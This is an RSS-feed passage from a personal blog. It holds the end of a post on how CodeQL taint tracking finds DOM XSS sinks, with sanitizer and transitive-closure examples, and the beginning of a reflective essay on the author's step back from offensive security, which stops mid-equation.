<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getReceiver</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">getALocalSource</span><span style="color:#ADBAC7">().(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">NewNode</span><span style="color:#ADBAC7">).</span><span style="color:#DCBDFB">getCalleeName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#96D0FF"> "DOMParser"</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> call.</span><span style="color:#DCBDFB">getArgument</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#ADBAC7">  sink </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> DomBasedXss</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">TooltipSink</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>This defines which nodes in the data flow graph are considered sinks. In this case, we are identifying methods that can be used to inject
untrusted data into the DOM, such as <code>innerHTML</code>, <code>outerHTML</code>, <code>insertAdjacentHTML</code>, <code>srcdoc</code>, <code>document.write</code>, <code>document.writeln</code>, and <code>DOMParser.parseFromString</code>.
When untrusted data reaches these sinks, it can be used to execute arbitrary JavaScript code in the context of the page.</p>
<p>After the least fixed point is computed (and we have the completed set of all tainted elements in the program), we can then evaluate the sinks against this set
of tainted elements to determine of any tainted data can reach a sink. If so, we have a potential vulnerability.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">from</span><span style="color:#F69D50"> DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">PathNode</span><span style="color:#F69D50"> source</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">PathNode</span><span style="color:#F69D50"> sink</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">UnsafeDOMManipulationConfiguration</span><span style="color:#F69D50"> config</span></span>
<span data-line=""><span style="color:#F47067">where</span><span style="color:#ADBAC7"> config.</span><span style="color:#DCBDFB">hasFlowPath</span><span style="color:#ADBAC7">(source, sink)</span></span>
<span data-line=""><span style="color:#F47067">select</span><span style="color:#ADBAC7"> sink.</span><span style="color:#DCBDFB">getNode</span><span style="color:#ADBAC7">(), </span><span style="color:#96D0FF">"Potentially unsafe DOM manipulation with $@."</span><span style="color:#ADBAC7">, source.</span><span style="color:#DCBDFB">getNode</span><span style="color:#ADBAC7">(),</span></span>
<span data-line=""><span style="color:#96D0FF">  "untrusted data"</span></span></code></pre></figure>
<h2>Expanding the propagation function</h2>
<p>Sometimes, the default taint steps are insufficient to capture the desired propagation. One might extend this by overriding <code>isAdditionalTaintStep</code>:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">override</span><span style="color:#F47067"> predicate</span><span style="color:#DCBDFB"> isAdditionalTaintStep</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> pred</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> succ</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">ArrayCreationNode</span><span style="color:#ADBAC7"> array |</span></span>
<span data-line=""><span style="color:#ADBAC7">    pred </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> array.</span><span style="color:#DCBDFB">getAnElement</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    succ </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> array</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">MethodCallNode</span><span style="color:#ADBAC7"> find |</span></span>
<span data-line=""><span style="color:#ADBAC7">    find.</span><span style="color:#DCBDFB">getMethodName</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">regexpMatch</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"find|filter|some|every|map"</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    pred </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> find.</span><span style="color:#DCBDFB">getReceiver</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    succ </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> find.</span><span style="color:#DCBDFB">getCallback</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">).</span><span style="color:#DCBDFB">getParameter</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>This propagates taint through array elements and array methods like <code>find</code>, <code>filter</code>, <code>some</code>, <code>every</code>, and <code>map</code>.</p>
<p>One might also want to stop propagation of taint at a sanitization step. When a node is a sanitizer, its output is considered untainted, even if the input is tainted.
This can be done by overriding <code>isSanitizer</code>:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">override</span><span style="color:#F47067"> predicate</span><span style="color:#DCBDFB"> isSanitizer</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> node</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#ADBAC7">  node </span><span style="color:#F47067">=</span><span style="color:#F69D50"> DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#DCBDFB">moduleImport</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"dompurify"</span><span style="color:#ADBAC7">).</span><span style="color:#DCBDFB">getAMemberCall</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"sanitize"</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Here, we are considering the <code>sanitize</code> method from the <code>DOMPurify</code> library as a sanitizer.</p>
<p>These modify our propagation function <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> to include or exclude desired nodes when propagating taint.</p>
<h2>Aside: transitive closures</h2>
<p>CodeQL has built-in support for transitive closures, which is pretty cool.</p>
<p>The transitive closure of a relation <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>R</mi></mrow><annotation encoding="application/x-tex">R</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.00773em">R</span></span></span></span> is the smallest relation <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msup><mi>R</mi><mo>+</mo></msup></mrow><annotation encoding="application/x-tex">R^+</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7713em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7713em"><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mbin mtight">+</span></span></span></span></span></span></span></span></span></span></span> that contains <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>R</mi></mrow><annotation encoding="application/x-tex">R</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.00773em">R</span></span></span></span> and is transitive. Formally, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msup><mi>R</mi><mo>+</mo></msup></mrow><annotation encoding="application/x-tex">R^+</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7713em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7713em"><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mbin mtight">+</span></span></span></span></span></span></span></span></span></span></span> is the intersection of all transitive relations
that contain <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>R</mi></mrow><annotation encoding="application/x-tex">R</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.00773em">R</span></span></span></span>. This can be defined inductively:</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><msup><mi>R</mi><mn>0</mn></msup></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><mi mathvariant="normal">∅</mi></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><msup><mi>R</mi><mrow><mi>n</mi><mo>+</mo><mn>1</mn></mrow></msup></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><msup><mi>R</mi><mi>n</mi></msup><mo>∪</mo><mo stretchy="false">(</mo><mi>R</mi><mo>∘</mo><msup><mi>R</mi><mi>n</mi></msup><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
R^0 &amp;= \emptyset \\
R^{n+1} &amp;= R^n \cup (R \circ R^n)
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:3.0482em;vertical-align:-1.2741em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.7741em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8641em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span></span></span></span></span></span></span><span style="top:-2.3859em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8641em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">n</span><span class="mbin mtight">+</span><span class="mord mtight">1</span></span></span></span></span></span></span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2741em"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.7741em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord">∅</span></span></span><span style="top:-2.3859em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∪</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∘</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2741em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>The <em>reflexive</em> transitive closure is similar, but includes the identity relation:</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><msup><mi>R</mi><mn>0</mn></msup></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><mtext>id</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><msup><mi>R</mi><mrow><mi>n</mi><mo>+</mo><mn>1</mn></mrow></msup></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><msup><mi>R</mi><mi>n</mi></msup><mo>∪</mo><mo stretchy="false">(</mo><mi>R</mi><mo>∘</mo><msup><mi>R</mi><mi>n</mi></msup><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
R^0 &amp;= \text{id} \\
R^{n+1} &amp;= R^n \cup (R \circ R^n)
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:3.0482em;vertical-align:-1.2741em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.7741em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8641em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span></span></span></span></span></span></span><span style="top:-2.3859em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8641em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">n</span><span class="mbin mtight">+</span><span class="mord mtight">1</span></span></span></span></span></span></span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2741em"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.7741em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord text"><span class="mord">id</span></span></span></span><span style="top:-2.3859em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∪</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∘</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.00773em">R</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2741em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>In CodeQL, we can use the <code>+</code> operator to denote the transitive closure of a predicate, and the <code>*</code> operator to denote the reflexive transitive closure. For example:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">predicate</span><span style="color:#DCBDFB"> isReachableFrom</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">BasicBlock</span><span style="color:#F69D50"> start</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">BasicBlock</span><span style="color:#F69D50"> end</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#ADBAC7">  end </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> start.</span><span style="color:#DCBDFB">getASuccessor*</span><span style="color:#ADBAC7">()</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>This predicate evaluates to the set of all (<code>start</code>, <code>end</code>) pairs such that <code>end</code> is reachable from <code>start</code> by following zero or more edges in the control flow graph.</p>
<h2>Conclusion</h2>
<p>This is my humble attempt to pen down my mental model of how CodeQL works under the hood, which helps me to visualize how my queries are executed and how the
results are derived. It's a really interesting and powerful tool that, while lacking the user-friendliness of some other static analysis tools, makes up for it
with its flexibility and expressiveness.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[Why I'm "quitting" (offensive) security]]></title>
            <link>https://www.analogue.computer/blog/why-im-quitting-security</link>
            <guid>https://www.analogue.computer/blog/why-im-quitting-security</guid>
            <pubDate>Wed, 21 Aug 2024 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>When I interview for internships nowadays, one question that recruiters often ask me is "why not cybersecurity?".
Funnily enough, I've stepped back from security since the start of this year,
but many people still think I'm the "hacker" and competitive CTF player I used to be.
Even my friends and family often ask me how things are going in the industry, and whether I'm still doing "hacking stuff".</p>
<h2>How did we get here?</h2>
<p>To give you a bit more context about myself, I discovered infosec 3 years ago when I was trying to get out of being sent to the infantry.
As a Singaporean male, I had to serve in the army. It just so happened that there was a new scheme that allowed people to serve in "cybersecurity" units,
and the prospect of spending my days in an air-conditioned office instead of in the middle of a jungle was very appealing to me.</p>
<p>So without any knowledge of security at all, I borrowed a textbook from my teacher at the time and did what I was good at as an A-level student: memorizing
as much as I could a week before the exam. By a stroke of luck, I got in, and the rest was history.</p>
<p>My 18 year old self, who at the time was pretty sure he wanted to study Physics in university, probably wouldn't have believed that his next 3 years would
see him in Las Vegas, Lausanne, Stockholm, and other places around the world competing in CTF competitions, meeting some of the most talented people in the
industry, and spending countless hours in front of a computer screen instead of solving differential equations.</p>
<figure class="mx-auto"><img alt="Cyber SEA Games 2022, Thailand" loading="lazy" width="1479" height="1109" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcybersea.ca8f06b2.jpg&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcybersea.ca8f06b2.jpg&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcybersea.ca8f06b2.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">Team Singapore @ Cyber SEA Games 2022</figcaption></figure>
<p>I went through some structured training in the army with an emphasis on blue teaming. Then I tried my hand at CTFs for the first time — it was brutal.
I could solve maybe 1 or 2 basic challenges, but the rest of the time I just sat there being confused. But realising just how much I didn't know was
something that hooked me in, and I played CTFs almost every weekend for the next few months. We even formed our own team, Social Engineering Experts,
which in 2022 and 2023 was the top CTF team in Singapore.</p>
<p>Eventually I found my niche in web security. CTF trains you really well for source code review and exploit development, so I started poking around
open source projects and eventually got credited for 15 CVEs, most of which were from my deep dive into
<a href="https://infosec.zeyu2001.com/2022/http-request-smuggling-in-the-multiverse-of-parsing-flaws">HTTP request smuggling</a>.</p>
<p>I also started doing bug bounties because among other things, it was fun to hack my own government. I was invited to three private time-bound
programs organised by the Singapore government, and was ranked 1st (by "signal", or impact) in each one among global participants.</p>
<figure class="mx-auto"><img alt="MINDEF Bug Bounty Programme" loading="lazy" width="4464" height="2976" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fbugbounty.04a0329a.jpg&amp;w=3840&amp;q=75 1x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fbugbounty.04a0329a.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">MINDEF Bug Bounty Programme</figcaption></figure>
<p>It was really fun. I ended up playing CTFs with <a href="https://ctftime.org/team/205897/">Blue Water</a>,
with whom I won 2nd place at the <a href="https://defcon.org/">DEF CON</a> CTF in 2023. At some point, a teammate reached out to me and asked if I wanted to join
Electrovolt, a security consultancy that was partnering with <a href="https://cure53.de/">Cure53</a>. I started doing some work with them on a freelance basis,
whenever I had the time. The work has been super cool, working with some really talented people for really big clients.
This was also around the time I started my internship with TikTok, where I was doing security research at scale.</p>
<h2>The turning point</h2>
<p>After some time trying to break everything I could get my hands on, I started to feel like I was just breaking things for the sake of breaking them.
I was getting tired of the constant churn of finding bugs, writing reports, and moving on to the next target.
I was tired of the constant pressure to be the best, to be the first, to be the most impactful.</p>
<p>But the biggest question, however, simply boiled down to: "why don't they <strong><em>just</em></strong> fix it? It's not that hard." I couldn't understand why teams would
ignore important vulnerabilities, or when something is fixed only to be broken again in the next release. I couldn't understand why we were still finding
the same classes of vulnerabilities that have been known for years. It's like playing whack-a-mole, but the moles are the size of elephants and there's
only one hammer.</p>
<h2>University</h2>
<p>But no time to dwell on that too much, because I was starting university. I took this as an opportunity to take a step back from living and breathing
security to enjoy life and explore other interests.</p>
<p>I didn't expect my first year at Cambridge to be <em>this</em> busy. To be honest, I spent most of the year thinking I was going to fail. Everyone else seemed
to be doing so much better, and I was returning to a really difficult technical degree after years of not doing any math or theoretical computer science.
Cambridge certainly has a way of making you feel like you're not good enough, because I ended up managing a first-class grade in the end.</p>
<p>I was still doing <em>some</em> CTFs (I started playing with the Cambridge team, cheriPI) and freelance work on the side, but there was just a lot more
to try. I started doing hackathons and for the first time, I started thinking about what products people actually need.</p>
<figure class="mx-auto"><img alt="CheriPI @ LakeCTF 2023" loading="lazy" width="2048" height="1366" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcheripi.c919e331.jpg&amp;w=2048&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcheripi.c919e331.jpg&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fcheripi.c919e331.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">CheriPI @ LakeCTF 2023</figcaption></figure>
<p>A hackathon felt like a microcosm of a software shop. You have a team, a deadline, and a goal. No one cares about security when you're trying to get
a product out the door.</p>
<figure class="mx-auto"><img alt="Encode Club AI Hackathon in London" loading="lazy" width="2048" height="1536" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fencode.3dc79b04.jpg&amp;w=2048&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fencode.3dc79b04.jpg&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fencode.3dc79b04.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">Encode Club AI Hackathon in London</figcaption></figure>
<h2>How do we do good security, then?</h2>
<p>I'm spending this summer at <a href="https://www.open.gov.sg/">Open Government Products</a>, where I now have much more time to think about how to solve security
problems at scale, and in a way that lasts. I started to appreciate why security can be so hard, and why it's not just a matter of "just fixing it".</p>
<p>The truth is, security is hard because it's not just about fixing bugs. It's about fixing the process that led to the bug in the first place.
The organisations that are having repeated security incidents are the ones that have a broken process, often because they grew too fast without
thinking about security, and now they're playing catch-up. But it's hard to catch up when the processes you've put in place and the tools developers
have gotten comfortable with need to be fundamentally changed.</p>
<p>Security is not prioritised enough because the cost of poor security is not immediately visible. It's hard to quantify the cost of a security incident
that didn't happen, and it's hard to justify the cost of investing in security when you're not seeing any immediate benefits.
There are no returns when investing in security, only losses when you don't.</p>
<p>And if the probability of an incident is low in the first place, then the expected cost of standing around doing nothing, waiting for an incident to happen,
is lower than the cost of investing in security.</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi>E</mi><mo stretchy="false">[</mo><mtext>cost&nbsp;of&nbsp;doing&nbsp;nothing</mtext><mo stretchy="false">]</mo></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>=</mo><mi>P</mi><mo stretchy="false">(</mo><mtext>incident</mtext><mo stretchy="false">)</mo><mo>×</mo><mtext>cost&nbsp;of&nbsp;incident</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mo>&lt;</mo><mtext>cost&nbsp;of&nbsp;investing&nbsp;in&nbsp;security</mtext></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
E[\text{{cost of doing nothing}}] &amp;= P(\text{{incident}}) \times \text{{cost of incident}} \\
                             &amp;&lt; \text{{cost of investing in security}}
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:3em;vertical-align:-1.25em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.75em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mopen">[</span><span class="mord text"><span class="mord"><span class="mord">cost&nbsp;of&nbsp;doing&nbsp;nothing</span></span></span><span class="mclose">]</span></span></span><span style="top:-2.41em"><span class="pstrut" style="height:3em"></span><span class="mord"></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.25em"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.75em"><span style="top:-3.91em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span><span class="mopen">(</span><span class="mord text"><span class="mord"><span class="mord">incident</span></span></span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" 